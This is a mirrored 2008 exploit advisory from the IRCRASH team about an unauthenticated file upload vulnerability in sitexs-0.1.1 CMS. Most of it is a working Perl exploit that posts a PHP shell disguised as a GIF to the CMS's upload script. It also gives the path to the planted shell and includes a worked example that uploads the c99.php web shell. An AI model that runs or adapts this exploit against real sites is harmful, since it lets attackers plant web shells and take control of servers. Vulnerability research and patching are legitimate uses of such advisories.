Lucene search
+L

sitexs-upload.txt

🗓️ 05 May 2008 00:00:00Reported by IRCRASHType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Remote File Upload Vulnerability in sitexs-0.1.1 CMS with 0-Day Exploi

Code
`  
Author : Hadi Kiamarsi  
----------------------------------------------------------------------------------  
Discovered by : Hadi Kiamarsi  
----------------------------------------------------------------------------------  
Exploited By : Hadi Kiamarsi  
----------------------------------------------------------------------------------  
E-Mail : hadikiamarsi[at]hotmail.com  
----------------------------------------------------------------------------------  
WebSite : http://ircrash.com  
----------------------------------------------------------------------------------  
Our Team : ircrash  
----------------------------------------------------------------------------------  
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr  
----------------------------------------------------------------------------------  
  
CMS: sitexs-0.1.1 CMS ( All Version Vulnerable )   
Download CMS : http://dfn.dl.sourceforge.net/sourceforge/sitexs/sitexs-0.1.1.tar.gz  
  
----------------------------------------------------------------------------------  
Remote File Upload Vulnerability  
  
You Must turn on :  
  
register_globals = On  
register_long_arrays=on  
-----------------------------------------------------------------------------------  
Exploit :  
-----------------------------------------------------------------------------------  
#!/usr/bin/perl  
# Author : Hadi Kiamarsi  
# Discover By : Hadi Kiamarsi  
# Exploit By : Hadi Kiamarsi   
use LWP;  
use HTTP::Request::Common;  
$ua = $ua = LWP::UserAgent->new;;  
$res = $ua->request(POST 'http:www.example.com/[sitexs]/adm/visual/upload.php',   
Content_Type => 'form-data',  
Content => [  
UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" =>   
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',  
],  
);  
print $res->as_string();  
-----------------------------------------------------------------------------------  
  
you for use this exploit . you must your shell file exists in exploit directory  
then excute exploit you find your shell in below link  
  
www.example.com/[sitexs]/images/1.gif.php  
www.example.com/[sitexs]/images/[shell][.php]  
  
  
-----------------------------------------------------------------------------------  
Example :  
-----------------------------------------------------------------------------------  
#!/usr/bin/perl  
# Author : Hadi Kiamarsi  
# Discover By : Hadi Kiamarsi  
# Exploit By : Hadi Kiamarsi   
use LWP;  
use HTTP::Request::Common;  
$ua = $ua = LWP::UserAgent->new;;  
$res = $ua->request(POST 'http://localhost/adm/visual/upload.php',   
Content_Type => 'form-data',  
Content => [  
UPLOAD => ["c99.php", "1.gif.php", "Content-Type" =>   
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',  
],  
);  
print $res->as_string();  
  
-----------------------------------------------------------------------------------  
  
this bug is 0-Day  
  
-----------------------------------------------------------------------------------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 May 2008 00:00Current
7.4High risk
Vulners AI Score7.4
26